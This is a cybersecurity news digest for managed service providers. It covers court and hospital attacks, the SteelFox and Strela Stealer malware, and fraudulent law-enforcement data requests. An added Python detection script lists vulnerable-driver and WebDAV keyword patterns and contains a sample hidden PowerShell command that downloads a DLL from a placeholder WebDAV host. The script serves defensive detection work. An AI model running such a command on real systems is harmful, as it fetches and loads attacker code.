MSP cybersecurity news digest, November 12, 2024

Washington and California courts experience technology outages due to cyberattack

Washington state’s court systems were experiencing outages due to a potential cyber intrusion. This data system outage affected all state courts' judicial information systems, websites and associated services.

The Washington State Administrative Office of the Courts (AOC) confirmed "unauthorized activity" on their network and warned of intermittent disruptions. Courts in multiple counties and cities, including King and Pierce, reported impacts, with some experiencing issues in electronic filing and phone systems. While Pierce County Superior Court noted minimal effects, Thurston County postponed scheduled hearings.

The AOC did not specify whether it was a ransomware attack and remained silent on further details as its website stayed offline. This incident follows similar recent cyberattacks on California’s San Joaquin County Superior Court, which disrupted all digital services. Courts across the U.S. have faced a surge of such attacks over the past year, affecting operations significantly.

Georgia hospital experiences ransomware attack, disrupting its electronic health record system

Memorial Hospital and Manor in Bainbridge, Georgia, has been hit by a ransomware attack that disrupted access to its electronic health record system.

The hospital, which serves Decatur County and surrounding areas, reported the issue. Although it said the attack did not affect the level of patient care, the hospital did switch to pen-and-paper processes. IT specialists began system recovery after antivirus software flagged the threat. The hospital warned of potentially longer wait times but did not disclose whether any data breach occurred.

The Embargo ransomware gang, active since April 2024 and responsible for other U.S. health care attacks, claimed responsibility for this attack and the theft of 1.15 TB of data.

Cryptocurrency mined and credit card data stolen by new SteelFox malware package

SteelFox is a new malware package that mines cryptocurrency and steals credit card data, using the “bring your own vulnerable driver” method to gain SYSTEM privileges on Windows machines.

Distributed via torrent trackers and forums as crack tools for legitimate software like Foxit PDF Editor, JetBrains and AutoCAD, SteelFox tricks users seeking free activation tools. Once users run these tools, the malware drops hidden code that loads SteelFox, while still appearing legitimate until unpacking. The malware escalates privileges by running WinRing0.sys, a driver vulnerable to CVE-2020-14979 and CVE-2021-41285, gaining NT/SYSTEM-level access. With this high-level access, SteelFox installs a modified XMRig miner for Monero and connects to a mining pool using hardcoded credentials.

Additionally, the malware communicates with a command-and-control server over TLS 1.3 with certificate (SSL) pinning, which also frustrates interception of its traffic. It also deploys an infostealer that collects data from 13 browsers, including credit card details, browsing history and cookies. Researchers have observed SteelFox infections in countries including Brazil and China, and have highlighted its advanced development and significant threat level.

Strela Stealer malware targeting employees in Germany and Spain with phishing emails

A new Strela Stealer campaign is targeting employees in Germany and Spain, using phishing emails with zip file attachments that carry a mail credential stealer.

The malware uses a highly obfuscated JavaScript file that, when executed, launches a PowerShell command that reaches out to a WebDAV server to download a malicious DLL loader. This DLL, whose control flow is complicated by numerous conditional jumps, loads the main payload while evading disk-based detection. The final payload, Strela Stealer, first discovered in 2022, has been improved with control flow obfuscation, making analysis difficult, and uses strong encryption to safeguard stolen data.

The malware checks for specific locales (German, Spanish, Basque) before activation, targeting mail clients like Outlook and Thunderbird to collect credentials and system data. Once information is gathered, it is sent to an attacker-controlled server.
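As an added illustration (not from the digest or from the researchers it cites), the following Python sketches how a defender might flag the two behaviours described in the SteelFox and Strela Stealer items above, a WinRing0.sys driver load and a script-host-to-PowerShell-to-WebDAV chain, over constructed Sysmon-style events (event ID 6 is a driver load, event ID 1 a process creation); the host name, file names and paths in the sample events are placeholders.

```python
import ntpath

# Driver names to flag on load (Sysmon event ID 6). Seeded only with the driver
# named in the SteelFox report; extend it from a maintained vulnerable-driver list.
VULNERABLE_DRIVERS = {"winring0.sys"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}        # hosts that run the obfuscated JavaScript
POWERSHELL = {"powershell.exe", "pwsh.exe"}
WEBDAV_MARKERS = ("davwwwroot", "@ssl", "webdav")    # UNC forms used to reach WebDAV shares

def _base(path):
    return ntpath.basename(path or "").lower()

def rule_vulnerable_driver(ev):
    """SteelFox-style BYOVD: a known vulnerable driver is being loaded."""
    if ev.get("EventID") == 6 and _base(ev.get("ImageLoaded")) in VULNERABLE_DRIVERS:
        return "vulnerable_driver_load"
    return None

def rule_script_host_webdav(ev):
    """Strela-style chain: a script host spawns PowerShell that reaches a WebDAV share."""
    if ev.get("EventID") != 1:
        return None
    if _base(ev.get("ParentImage")) not in SCRIPT_HOSTS or _base(ev.get("Image")) not in POWERSHELL:
        return None
    cmd = (ev.get("CommandLine") or "").lower()
    return "script_host_powershell_webdav" if any(m in cmd for m in WEBDAV_MARKERS) else None

RULES = (rule_vulnerable_driver, rule_script_host_webdav)

def scan(events):
    """Return (rule_name, event) pairs for every event that matches a rule."""
    return [(name, ev) for ev in events for rule in RULES if (name := rule(ev))]

# Constructed sample events, not real telemetry; host, file names and paths are placeholders.
SAMPLE_EVENTS = [
    {"EventID": 6, "ImageLoaded": r"C:\Users\user\AppData\Local\Temp\WinRing0.sys"},
    {"EventID": 6, "ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -w hidden Copy-Item \\webdav.example.invalid@SSL\DavWWWRoot\loader.dll $env:TEMP"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-Date"},
]

if __name__ == "__main__":
    for name, ev in scan(SAMPLE_EVENTS):
        print(name, ev.get("ImageLoaded") or ev.get("CommandLine"))
```

The benign tcpip.sys load and the explorer-launched PowerShell in the sample set are there to show that neither rule fires on ordinary activity.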

Cybercriminals using fraudulent emergency data requests, posing as law enforcement: FBI alert

The FBI has warned of a rise in fraudulent emergency data requests (EDRs) used by cybercriminals impersonating law enforcement through compromised government emails.

EDRs enable U.S. law enforcement to access data from tech providers during emergencies without a warrant. While designed for life-or-death scenarios, cybercriminals exploit EDRs to bypass review processes and swiftly obtain data. The Lapsus$ threat actor group pioneered this method, but recent reports show a significant increase in such fraudulent activities.

The alert highlighted six cases of criminals selling sensitive information on dark web forums, with some criminals even offering tutorials on submitting fake EDRs. To counter these threats, the FBI advises companies to verify the authenticity of EDRs before releasing data, enhance cybersecurity measures and maintain contact with local FBI field offices.